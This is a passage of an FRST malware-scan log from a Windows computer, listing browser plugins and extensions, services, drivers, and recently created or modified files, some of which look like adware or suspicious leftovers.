FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect - C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll (Adobe Systems)
FF Plugin HKCU: @alibaba.com/npAliSSOLogin;version=1.0 - C:\Program Files (x86)\AliWangWang\8.00.08C\npAliSSOLogin.dll (淘宝（中国）软件有限公司)
FF Plugin HKCU: @alibaba.com/npwangwang;version=1.0 - C:\Program Files (x86)\AliWangWang\8.00.08C\npwangwang.dll ( )
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin - C:\Users\AIR\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin - C:\Users\AIR\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Users\AIR\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Users\AIR\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: facebook.com/fbDesktopPlugin - C:\Users\AIR\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll (Facebook, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\AIR\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\AIR\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF HKLM-x32\...\Firefox\Extensions: [ntfdsaftsfdfdxx@mozilla.org] - C:\Users\AIR\AppData\Roaming\iPumper\extension_firefox.xpi
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2013-09-14]

Chrome:
=======
CHR DefaultSearchKeyword: google.com.hk
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.2.464\_platform_specific\win_x86\widevinecdmadapter.dll ()
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\pdf.dll ()
CHR Plugin: (Screen Capture Plugin) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\alelhddbbhepgpmgidjdcjakblofbmce\3.6.9_0\plugins/screen_capture.dll No File
CHR Plugin: (Adobe Create PDF) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj\11.0.3.37_0\plugin/npWCChromeExtnStub.dll No File
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (AdobeExManDetect) - C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll (Adobe Systems)
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (AliSSOLogin plugin) - C:\Program Files (x86)\AliWangWang\8.00.08C\npAliSSOLogin.dll (淘宝（中国）软件有限公司)
CHR Plugin: (AliWangWang Plug-In For Firefox and Netscape) - C:\Program Files (x86)\AliWangWang\8.00.08C\npwangwang.dll ( )
CHR Plugin: (AdobeAAMDetect) - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Java Deployment Toolkit 7.0.510.13) - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java(TM) Platform SE 7 U51) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live™ Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Microsoft Office 2013) - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2013) - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
CHR Plugin: (Facebook Desktop) - C:\Users\AIR\AppData\Local\Facebook\Messenger\2.1.4814.0\npFbDesktopPlugin.dll (Facebook, Inc.)
CHR Plugin: (Google Update) - C:\Users\AIR\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll No File
CHR Plugin: (Google Talk Plugin) - C:\Users\AIR\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
CHR Plugin: (Google Talk Plugin Video Renderer) - C:\Users\AIR\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
CHR Plugin: (Shockwave for Director) - C:\Windows\SysWOW64\Adobe\Director\np32dsw_1207148.dll (Adobe Systems, Inc.)
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll No File
CHR Plugin: (Alipay Security Control 3) - C:\Windows\system32\aliedit\3.7.0.0\npAliSecCtrl.dll No File
CHR Plugin: (Alipay webmod control) - C:\Windows\system32\aliedit\3.7.0.0\npalidcp.dll No File
CHR Plugin: (Alipay security control) - C:\Windows\system32\aliedit\3.7.0.0\npaliedit.dll No File
CHR Plugin: (iTrusChina iTrusPTA,XEnroll,iEnroll,hwPTA,UKeyInstalls Firefox Plugin) - C:\Windows\system32\itruscert\NPComBrg701.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
CHR Extension: (Awesome Screenshot: Capture & Annotate) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\alelhddbbhepgpmgidjdcjakblofbmce [2013-11-24]
CHR Extension: (Google Docs) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-24]
CHR Extension: (Google Drive) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-24]
CHR Extension: (YouTube) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-24]
CHR Extension: (Adblock Plus) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2013-11-24]
CHR Extension: (Google Search) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-24]
CHR Extension: (Screen Capture (by Google)) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\cpngackimfmofbokmjmljamhdncknpmg [2013-11-24]
CHR Extension: (Adobe Acrobat - Create PDF) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2013-11-24]
CHR Extension: (Marble) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijhebjoppbkfocoeceijgihihgckeool [2013-11-24]
CHR Extension: (Neokazam!) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbnlajaechdnkmidcfkmlaofdgbdadfe [2014-03-24]
CHR Extension: (Google Wallet) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-24]
CHR Extension: (Docs PDF/PowerPoint Viewer (by Google)) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nnbmlagghjjcbdhgmkedmbmedengocbn [2014-02-09]
CHR Extension: (Gmail) - C:\Users\AIR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-24]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2013-09-05]
CHR HKLM-x32\...\Chrome\Extension: [kekfoodhbhpjhjcdecjngamojfhknooc] - C:\Users\AIR\AppData\Roaming\iPumper\extension_chrome.crx [2013-09-05]

==================== Services (Whitelisted) =================

R2 AlipaySecSvc; C:\Program Files (x86)\alipay\alieditplus\AlipaySecSvc.exe [540032 2014-03-07] (Alipay Inc. )
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [3645456 2014-04-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [291912 2014-03-27] (AVG Technologies CZ, s.r.o.)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2211000 2014-03-30] (Microsoft Corporation)
R2 HP Power Assistant Service; C:\Program Files\Hewlett-Packard\HP Power Assistant\HPPA_Service.exe [107576 2010-11-17] ()
R2 ImeDictUpdateService; C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE [83312 2010-10-20] (Microsoft Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)
S3 OpenVPNService; C:\Program Files (x86)\OpenVPN\bin\openvpnserv.exe [29920 2013-03-07] (The OpenVPN Project)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1127448 2011-02-01] (PDF Complete Inc)
R2 SENADB; C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe [103584 2012-07-11] ()
R2 SEVPNCLIENT; C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe [4178488 2013-11-24] (SoftEther Project at University of Tsukuba, Japan.)

==================== Drivers (Whitelisted) ====================

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-03-27] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [237336 2014-04-18] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [192792 2014-03-27] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [236824 2014-03-27] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [324376 2014-03-27] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [130840 2014-03-31] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [32536 2014-03-27] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [274200 2014-03-31] (AVG Technologies CZ, s.r.o.)
S3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv_x64.sys [44928 2012-10-11] (ManyCam LLC)
S3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [28160 2013-01-31] (ManyCam LLC)
R3 Neo_VPN; C:\Windows\System32\DRIVERS\Neo_0019.sys [28768 2013-04-13] (SoftEther Project at University of Tsukuba, Japan.)
R2 PassGuard; C:\Windows\system32\drivers\PassGuard_x64.sys [254832 2013-09-16] ()
S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]
S3 motport; system32\DRIVERS\motport.sys [X]
U3 kxldrpow; \??\C:\Users\AIR\AppData\Local\Temp\kxldrpow.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-05-10 21:43 - 2014-05-10 21:43 - 00034457 _____ () C:\Users\AIR\Desktop\FRST.txt
2014-05-10 21:43 - 2014-05-10 21:43 - 00000000 ____D () C:\FRST
2014-05-10 21:42 - 2014-05-10 21:42 - 02065408 _____ (Farbar) C:\Users\AIR\Desktop\FRST64.exe
2014-05-10 20:49 - 2014-05-10 20:49 - 00025658 _____ () C:\Users\AIR\AppData\Local\recently-used.xbel
2014-05-10 20:35 - 2014-05-10 20:35 - 00058704 _____ () C:\Users\AIR\Desktop\ark.txt
2014-05-10 19:45 - 2014-05-10 19:45 - 00380416 _____ () C:\Users\AIR\Desktop\63r8jur5.exe
2014-05-10 19:41 - 2014-05-10 19:41 - 00009613 _____ () C:\Users\AIR\Desktop\attach.txt
2014-05-10 19:41 - 2014-05-10 19:40 - 00027894 _____ () C:\Users\AIR\Desktop\dds.txt
2014-05-10 19:38 - 2014-05-10 19:38 - 00688992 ____R (Swearware) C:\Users\AIR\Desktop\dds.scr
2014-05-10 19:37 - 2014-05-10 19:37 - 00017745 _____ () C:\Users\AIR\Desktop\hijackthis.log
2014-05-10 19:35 - 2014-05-10 19:35 - 00388608 _____ (Trend Micro Inc.) C:\Users\AIR\Desktop\HijackThis.exe
2014-05-10 18:30 - 2014-05-10 18:30 - 08326064 _____ (McAfee, Inc.) C:\Users\AIR\Desktop\SecurityScan_Release.exe
2014-05-10 17:26 - 2014-05-10 17:26 - 02347384 _____ (ESET) C:\Users\AIR\Desktop\esetsmartinstaller_enu.exe
2014-05-10 17:26 - 2014-05-10 17:26 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-05-10 17:01 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-05-10 17:00 - 2014-05-10 17:00 - 01316991 _____ () C:\Users\AIR\Desktop\AdwCleaner.exe
2014-05-10 16:29 - 2014-05-10 16:29 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\alipay
2014-05-10 16:28 - 2014-05-10 16:29 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Google
2014-05-10 16:28 - 2014-05-10 16:28 - 00125000 _____ () C:\Users\AIR_2\AppData\Local\GDIPFONTCACHEV1.DAT
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Google
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\ATI
2014-05-10 16:28 - 2014-05-10 16:28 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\ATI
2014-05-10 16:27 - 2014-05-10 16:55 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\AVG2014
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 __SHD () C:\Users\AIR_2\AppData\Local\EmieUserList
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 __SHD () C:\Users\AIR_2\AppData\Local\EmieSiteList
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Apple Computer
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\PDFC
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Avg2014
2014-05-10 16:27 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Adobe
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\TaobaoProtect
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Motorola Mobility
2014-05-10 16:26 - 2014-05-10 16:55 - 00000000 ____D () C:\Users\AIR_2
2014-05-10 16:26 - 2014-05-10 16:29 - 00002193 _____ () C:\Users\AIR_2\Desktop\Google Chrome.lnk
2014-05-10 16:26 - 2014-05-10 16:27 - 00000000 ___RD () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-10 16:26 - 2014-05-10 16:27 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Adobe
2014-05-10 16:26 - 2014-05-10 16:26 - 00001327 _____ () C:\Users\AIR_2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-05-10 16:26 - 2014-05-10 16:26 - 00000808 __RSH () C:\Users\AIR_2\ntuser.pol
2014-05-10 16:26 - 2014-05-10 16:26 - 00000020 ___SH () C:\Users\AIR_2\ntuser.ini
2014-05-10 16:26 - 2013-09-01 15:19 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\Macromedia
2014-05-10 16:26 - 2013-05-10 09:25 - 00000000 ____D () C:\Users\AIR_2\AppData\Roaming\TuneUp Software
2014-05-10 16:26 - 2013-02-08 12:55 - 00000000 ____D () C:\Users\AIR_2\AppData\Local\Microsoft Help
2014-05-10 16:22 - 2014-05-10 16:22 - 00000584 __RSH () C:\Users\AIR\ntuser.pol
2014-05-10 14:44 - 2014-05-10 21:36 - 00003642 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-09 21:25 - 2014-05-09 21:25 - 00012272 _____ () C:\Users\AIR\Desktop\fiesta mc list.xlsx
2014-05-09 21:11 - 2014-05-09 21:11 - 00090643 _____ () C:\Users\AIR\Desktop\65th Anniversary Concert_Food & Beverage_Sample.xlsx
2014-05-07 14:31 - 2014-04-29 22:01 - 23547904 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-07 14:31 - 2014-04-29 21:40 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-07 14:31 - 2014-04-29 20:48 - 17384448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-07 14:31 - 2014-04-29 20:34 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-07 06:24 - 2014-05-07 06:24 - 00000000 __SHD () C:\Users\AIR\AppData\Local\EmieUserList
2014-05-07 06:24 - 2014-05-07 06:24 - 00000000 __SHD () C:\Users\AIR\AppData\Local\EmieSiteList
2014-05-07 03:22 - 2014-05-10 17:16 - 00001624 _____ () C:\Windows\setupact.log
2014-05-07 03:22 - 2014-05-07 03:22 - 00000000 _____ () C:\Windows\setuperr.log
2014-05-07 03:19 - 2014-05-07 03:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-07 03:02 - 2014-03-06 17:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-05-07 03:02 - 2014-03-06 16:59 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-05-07 03:02 - 2014-03-06 16:57 - 00548352 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-05-07 03:02 - 2014-03-06 16:57 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-05-07 03:02 - 2014-03-06 16:53 - 02767360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-05-07 03:02 - 2014-03-06 16:40 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-05-07 03:02 - 2014-03-06 16:39 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-05-07 03:02 - 2014-03-06 16:32 - 00574976 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-05-07 03:02 - 2014-03-06 16:29 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-05-07 03:02 - 2014-03-06 16:29 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-05-07 03:02 - 2014-03-06 16:28 - 00752640 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-05-07 03:02 - 2014-03-06 16:15 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-05-07 03:02 - 2014-03-06 16:11 - 05784064 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-05-07 03:02 - 2014-03-06 16:09 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-05-07 03:02 - 2014-03-06 16:03 - 00586240 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-05-07 03:02 - 2014-03-06 16:02 - 00455168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-05-07 03:02 - 2014-03-06 16:02 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-05-07 03:02 - 2014-03-06 16:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-05-07 03:02 - 2014-03-06 15:56 - 00038400 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-05-07 03:02 - 2014-03-06 15:48 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-05-07 03:02 - 2014-03-06 15:47 - 02178048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-05-07 03:02 - 2014-03-06 15:46 - 04254720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-05-07 03:02 - 2014-03-06 15:46 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-05-07 03:02 - 2014-03-06 15:45 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-05-07 03:02 - 2014-03-06 15:42 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-05-07 03:02 - 2014-03-06 15:40 - 00440832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-05-07 03:02 - 2014-03-06 15:38 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-05-07 03:02 - 2014-03-06 15:36 - 00592896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-05-07 03:02 - 2014-03-06 15:22 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-05-07 03:02 - 2014-03-06 15:21 - 00628736 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-05-07 03:02 - 2014-03-06 15:13 - 00032256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-05-07 03:02 - 2014-03-06 15:11 - 02043904 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-05-07 03:02 - 2014-03-06 15:07 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-05-07 03:02 - 2014-03-06 15:01 - 00244224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-05-07 03:02 - 2014-03-06 14:53 - 13551104 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-05-07 03:02 - 2014-03-06 14:46 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-05-07 03:02 - 2014-03-06 14:40 - 01967104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-05-07 03:02 - 2014-03-06 14:36 - 11745792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-05-07 03:02 - 2014-03-06 14:22 - 02260480 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-05-07 03:02 - 2014-03-06 13:58 - 01400832 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-05-07 03:02 - 2014-03-06 13:50 - 00846336 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-05-07 03:02 - 2014-03-06 13:43 - 00704512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-05-07 03:02 - 2014-03-06 13:41 - 01789440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-05-07 03:02 - 2014-03-06 13:36 - 01143808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-05-06 23:42 - 2014-04-14 10:24 - 00465408 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-06 23:42 - 2014-04-14 10:19 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-03 09:59 - 2014-05-03 09:59 - 00000000 ____D () C:\Users\AIR\AppData\Local\{3682DD9A-1555-459A-84C9-46FBA34C3AFF}
2014-05-02 12:46 - 2014-05-02 12:46 - 00000000 ____D () C:\Users\AIR\AppData\Local\{E8E24688-FD0A-4605-81C2-280A86A79587}
2014-04-28 21:23 - 2014-04-28 21:23 - 07559143 _____ () C:\Users\AIR\Desktop\file_20140428.zip
2014-04-28 00:22 - 2014-05-03 10:01 - 00002031 _____ () C:\Users\AIR\Documents\movie.wlmp
2014-04-27 15:29 - 2014-04-27 15:29 - 00000000 ____D () C:\Users\AIR\AppData\Local\{17D1600E-66DF-4C31-A70C-41C04C20BED3}
2014-04-25 00:16 - 2014-04-25 10:52 - 00000000 ____D () C:\Users\AIR\AppData\OICE_15_974FA576_32C1D314_28A8
2014-04-24 16:45 - 2014-04-24 16:45 - 00001120 _____ () C:\Users\AIR\Desktop\501 - 捷徑.lnk
2014-04-23 23:00 - 2014-04-23 23:07 - 00000000 ____D () C:\Users\AIR\Desktop\Moto Photo
2014-04-21 09:08 - 2014-04-21 09:08 - 14813831 _____ () C:\Users\AIR\Desktop\Mom.xcf
2014-04-20 17:44 - 2014-04-20 17:44 - 07559143 _____ () C:\Users\AIR\Desktop\file_20140420.zip
2014-04-20 17:09 - 2014-04-20 17:09 - 00000000 ____D () C:\ProgramData\Avg_Update_0414b
2014-04-18 15:01 - 2014-04-18 15:01 - 00237336 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgidsdrivera.sys
2014-04-17 01:43 - 2014-04-17 02:16 - 00000000 ____D () C:\FFOutput
2014-04-17 01:42 - 2014-04-17 01:43 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FormatFactory
2014-04-17 01:42 - 2014-04-17 01:42 - 00000000 ____D () C:\Program Files (x86)\FreeTime
2014-04-17 01:34 - 2014-04-17 01:34 - 00000000 ____D () C:\Users\AIR\AppData\Local\{45961A9D-70DF-42D2-91D4-BDC752BD64B7}

==================== One Month Modified Files and Folders =======

2014-05-10 21:43 - 2014-05-10 21:43 - 00034457 _____ () C:\Users\AIR\Desktop\FRST.txt
2014-05-10 21:43 - 2014-05-10 21:43 - 00000000 ____D () C:\FRST
2014-05-10 21:42 - 2014-05-10 21:42 - 02065408 _____ (Farbar) C:\Users\AIR\Desktop\FRST64.exe
2014-05-10 21:42 - 2013-10-05 23:06 - 00000900 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000UA.job
2014-05-10 21:36 - 2014-05-10 14:44 - 00003642 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-10 21:28 - 2013-06-09 00:27 - 00000468 _____ () C:\Windows\Tasks\AliUpdater{B46EAC48-AA8C-4A67-A782-738077F2149F}.job
2014-05-10 21:27 - 2013-03-24 15:22 - 00000920 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-879570740-1523932123-957937009-1000UA.job
2014-05-10 21:23 - 2013-02-13 15:48 - 00000536 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-05-10 21:20 - 2014-02-18 10:05 - 00000000 ____D () C:\Users\AIR\AppData\Roaming\TaobaoProtect
2014-05-10 21:03 - 2013-05-22 13:44 - 00000000 ____D () C:\Users\AIR\Desktop\Typed Works
2014-05-10 20:55 - 2013-03-10 09:40 - 00000526 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-05-10 20:49 - 2014-05-10 20:49 - 00025658 _____ () C:\Users\AIR\AppData\Local\recently-used.xbel
2014-05-10 20:49 - 2013-05-01 23:32 - 00000000 ____D () C:\Users\AIR\.gimp-2.8
2014-05-10 20:49 - 2013-02-20 20:38 - 00000000 ____D () C:\Users\AIR\Desktop\Kelvin
